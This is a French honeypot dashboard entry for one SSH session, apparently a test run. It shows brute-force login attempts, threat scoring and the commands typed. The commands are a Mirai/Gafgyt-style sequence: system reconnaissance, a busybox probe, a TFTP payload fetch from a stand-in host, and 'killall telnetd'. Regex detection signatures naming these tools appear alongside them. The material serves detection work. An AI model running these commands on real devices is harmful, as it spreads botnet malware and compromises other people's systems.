HoneySSH Tableau de bord du honeypot

Session #20

82.64.85.153 · 26/07/2026 23:16:33

Score 100/100
Classification critical
Scanner gafgyt_suspected
Durée 3 s

Réseau

IP
82.64.85.153
Port source
64282
Pays
France FR
Ville
ASN
Opérateur
Réseau
Hébergeur
Non détecté

Connexion SSH

Client
SSH-2.0-paramiko_5.0.0
Utilisateur accepté
test-mirai
Mot de passe accepté
honeypot-test
Début
26/07/2026 23:16:33
Fin
26/07/2026 23:16:36

Tentatives d’authentification

Date Utilisateur Mot de passe Résultat
26/07/2026 23:16:33 1 test-mirai test-one Refusé
26/07/2026 23:16:33 2 test-mirai admin123 Refusé
26/07/2026 23:16:33 3 test-mirai password Refusé
26/07/2026 23:16:33 4 test-mirai honeypot-test Accepté

Événements de menace

Date Type Gravité Points Description Preuve
26/07/2026 23:16:33 scanner_detection 3/5 +15 Scanner automatisé suspecté : hydra_or_ncrack_suspected 4 tentatives dans la même session; cadence rapide=True
26/07/2026 23:16:33 fake_login 1/5 +5 Faux login accepté test-mirai
26/07/2026 23:16:34 reconnaissance 1/5 +5 Reconnaissance du système cat /proc/cpuinfo
26/07/2026 23:16:34 mirai_behavior 4/5 +20 Utilisation de BusyBox /bin/busybox uname -a
26/07/2026 23:16:34 iot_scanner 5/5 +15 Campagne ou famille de malware suspectée : iot_scanner_suspected (?:^|/)busybox\b, /proc/(?:cpuinfo|mounts|meminfo), \buname\s+(?:-a|-m)\b
26/07/2026 23:16:34 scanner_detection 3/5 +0 Scanner automatisé suspecté : iot_scanner_suspected Signatures comportementales : (?:^|/)busybox\b, /proc/(?:cpuinfo|mounts|meminfo), \buname\s+(?:-a|-m)\b
26/07/2026 23:16:35 payload_download 3/5 +20 Téléchargement avec TFTP ou FTP tftp 192.0.2.10 -g -r mirai-test
26/07/2026 23:16:35 botnet 5/5 +25 Campagne ou famille de malware suspectée : mirai_suspected (?:^|/)busybox\b, \b(?:tftp|ftpget|wget)\b, /proc/(?:mounts|cpuinfo)
26/07/2026 23:16:35 scanner_detection 3/5 +0 Scanner automatisé suspecté : mirai_suspected Signatures comportementales : (?:^|/)busybox\b, \b(?:tftp|ftpget|wget)\b, /proc/(?:mounts|cpuinfo)
26/07/2026 23:16:35 defense_evasion 3/5 +12 Arrêt de processus ou de services killall telnetd
26/07/2026 23:16:35 botnet 5/5 +25 Campagne ou famille de malware suspectée : gafgyt_suspected (?:^|/)busybox\b, \bkillall\b, \b(?:wget|tftp)\b
26/07/2026 23:16:35 scanner_detection 3/5 +0 Scanner automatisé suspecté : gafgyt_suspected Signatures comportementales : (?:^|/)busybox\b, \bkillall\b, \b(?:wget|tftp)\b

Commandes

26/07/2026 23:16:34 · délai 0 ms
$ cat /proc/cpuinfo
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model name	: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz
cpu MHz		: 2394.454
cache size	: 35840 KB
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr sse sse2 ss ht syscall nx lm
26/07/2026 23:16:34 · délai 364 ms
$ /bin/busybox uname -a
bash: /bin/busybox: command not found
26/07/2026 23:16:35 · délai 491 ms
$ tftp 192.0.2.10 -g -r mirai-test
Connecting...
wget: unable to resolve host address: Temporary failure in name resolution
26/07/2026 23:16:35 · délai 455 ms
$ killall telnetd
bash: killall: command not found
26/07/2026 23:16:35 · délai 417 ms
$ exit
logout